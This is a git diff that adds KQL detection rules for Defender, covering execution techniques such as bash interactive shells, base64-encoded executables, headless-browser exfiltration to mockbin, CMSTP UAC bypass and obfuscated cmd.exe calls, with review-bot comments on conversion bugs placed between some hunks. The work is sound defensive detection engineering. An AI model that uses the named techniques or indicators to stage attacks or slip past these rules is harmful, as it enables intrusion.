new file mode 100644
index 00000000..48bb255a
--- /dev/null
+++ b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms
+// Author: Sreeman
+// Date: 2020-03-13
+// Level: medium
+// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
+// MITRE Tactic: Execution
+// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
new file mode 100644
index 00000000..e24bcbd5
--- /dev/null
+++ b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql
@@ -0,0 +1,13 @@
+// Title: Assembly DLL Creation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: medium
+// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate assembly compilation using a build provider
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/Execution/base64_mz_header_in_commandline.kql b/KQL/rules/Execution/base64_mz_header_in_commandline.kql
new file mode 100644
index 00000000..deff3393
--- /dev/null
+++ b/KQL/rules/Execution/base64_mz_header_in_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Base64 MZ Header In CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects encoded base64 MZ header in the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA"
\ No newline at end of file
diff --git a/KQL/rules/Execution/bash_interactive_shell.kql b/KQL/rules/Execution/bash_interactive_shell.kql
new file mode 100644
index 00000000..0d0ba1f4
--- /dev/null
+++ b/KQL/rules/Execution/bash_interactive_shell.kql
@@ -0,0 +1,10 @@
+// Title: Bash Interactive Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: low
+// Description: Detects execution of the bash shell with the interactive flag "-i".
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -i " and FolderPath endswith "/bash"
\ No newline at end of file
diff --git a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql
new file mode 100644
index 00000000..4b800d52
--- /dev/null
+++ b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql
@@ -0,0 +1,12 @@
+// Title: Binary Proxy Execution Via Dotnet-Trace.EXE
+// Author: Jimmy Bayne (@bohops)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the utility in order to debug and trace a program.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql
new file mode 100644
index 00000000..94cd4f50
--- /dev/null
+++ b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql
@@ -0,0 +1,12 @@
+// Title: BPFtrace Unsafe Option Usage
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2022-02-11
+// Level: medium
+// Description: Detects the usage of the unsafe bpftrace option
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004
+// False Positives:
+// - Legitimate usage of the unsafe option
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--unsafe" and FolderPath endswith "bpftrace"
\ No newline at end of file
diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
new file mode 100644
index 00000000..48d40c08
--- /dev/null
+++ b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql
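Review bot: In the BPFtrace Unsafe Option Usage hunk, `FolderPath endswith "bpftrace"` has no leading path separator, unlike the sibling Linux rules in this commit that anchor on `"/bash"` and `"/capsh"`, so any binary whose name merely ends in `bpftrace` would also match. Anchoring it the same way, `FolderPath endswith "/bpftrace"`, keeps the rule consistent with the others and avoids that collision. This may faithfully mirror the upstream rule, in which case it is a tightening to consider rather than a conversion error.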
@@ -0,0 +1,11 @@
+// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/Execution/capsh_shell_invocation_linux.kql
new file mode 100644
index 00000000..fcbfc541
--- /dev/null
+++ b/KQL/rules/Execution/capsh_shell_invocation_linux.kql
@@ -0,0 +1,11 @@
+// Title: Capsh Shell Invocation - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "capsh" utility to invoke a shell.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith " --" and FolderPath endswith "/capsh"
\ No newline at end of file
diff --git a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql
new file mode 100644
index 00000000..59879370
--- /dev/null
+++ b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql
@@ -0,0 +1,12 @@
+// Title: Change PowerShell Policies to an Insecure Level
+// Author: frack113
+// Date: 2021-11-01
+// Level: medium
+// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrator scripts
+
+DeviceProcessEvents
+| where (((ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")) and (not(((ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\" or ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\") and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) and (not(((ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast" or ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\") and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "\\instup.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql
new file mode 100644
index 00000000..b69a82b1
--- /dev/null
+++ b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql
@@ -0,0 +1,10 @@
+// Title: Chromium Browser Headless Execution To Mockbin Like Site
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-09-11
+// Level: high
+// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin")
\ No newline at end of file
diff --git a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
new file mode 100644
index 00000000..60294be8
--- /dev/null
+++ b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql
@@ -0,0 +1,10 @@
+// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location
+// Author: X__Junior
+// Date: 2025-01-20
+// Level: medium
+// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\clfs.sys" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql
new file mode 100644
index 00000000..a592813f
--- /dev/null
+++ b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql
@@ -0,0 +1,10 @@
+// Title: CLR DLL Loaded Via Office Applications
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: medium
+// Description: Detects CLR DLL being loaded by an Office Product
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
new file mode 100644
index 00000000..54471fa2
--- /dev/null
+++ b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Cmd.EXE Missing Space Characters Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
+This could be a sign of obfuscation of a fat finger problem (typo by the developer).
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or 
ProcessCommandLine contains "cmd /r "))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql
new file mode 100644
index 00000000..5f2d0335
--- /dev/null
+++ b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP UAC Bypass via COM Object Access
+// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
+// Date: 2019-07-31
+// Level: high
+// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql
new file mode 100644
index 00000000..dbf199d3
--- /dev/null
+++ b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql
@@ -0,0 +1,12 @@
+// Title: Command Line Execution with Suspicious URL and AppData Strings
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105
+// False Positives:
+// - High
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql
new file mode 100644
index 00000000..0683ba40
--- /dev/null
+++ b/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Computer Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql
new file mode 100644
index 00000000..ab3422d1
--- /dev/null
+++ b/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql
@@ -0,0 +1,12 @@
+// Title: Conhost.exe CommandLine Path Traversal
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-14
+// Level: high
+// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost"
\ No newline at end of file
diff --git a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..912ec61c
--- /dev/null
+++ b/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Conhost Spawned By Uncommon Parent Process
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC" or InitiatingProcessCommandLine contains "-k wusvcs -p -s WaaSMedicSvc"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql
new file mode 100644
index 00000000..1fab717d
--- /dev/null
+++ b/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql
@@ -0,0 +1,10 @@
+// Title: Csc.EXE Execution Form Potentially Suspicious Parent
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-02-11
+// Level: high
+// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
new file mode 100644
index 00000000..15912d84
--- /dev/null
+++ b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql
@@ -0,0 +1,14 @@
+// Title: Cscript/Wscript Potentially Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
+Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith "\\rundll32.exe" or ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and ((ProcessCommandLine contains "mshta" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec")))) and (not(((ProcessCommandLine contains "UpdatePerUserSystemParameters" or ProcessCommandLine contains "PrintUIEntry" or ProcessCommandLine contains "ClearMyTracksByProcess") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql
new file mode 100644
index 00000000..f7954e93
--- /dev/null
+++ b/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql
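Review bot: The second line of the description, `Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.`, is emitted without the `// ` prefix, so the generated .kql is no longer a valid query: a bare sentence sits between two comment lines and the parser will reject the file. The same unprefixed continuation appears in data_export_from_mssql_table_via_bcp_exe.kql (`Attackers were seen saving ...`), detection_of_powershell_execution_via_sqlps_exe.kql (`Script blocks are not logged ...`) and dsinternals_suspicious_powershell_cmdlets.kql (`The DSInternals PowerShell Module ...`). The converter should prefix every line of a multi-line description, e.g. `// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.`; the extra blank line before `// MITRE Tactic:` in the same four files is presumably the trailing newline of the same multi-line source field and can be dropped at the same time.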
@@ -0,0 +1,10 @@
+// Title: Cscript/Wscript Uncommon Script Extension Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/csexec_service_file_creation.kql b/KQL/rules/Execution/csexec_service_file_creation.kql
new file mode 100644
index 00000000..1820c971
--- /dev/null
+++ b/KQL/rules/Execution/csexec_service_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: CSExec Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
+| where FolderPath endswith "\\csexecsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql
new file mode 100644
index 00000000..03909a9d
--- /dev/null
+++ b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql
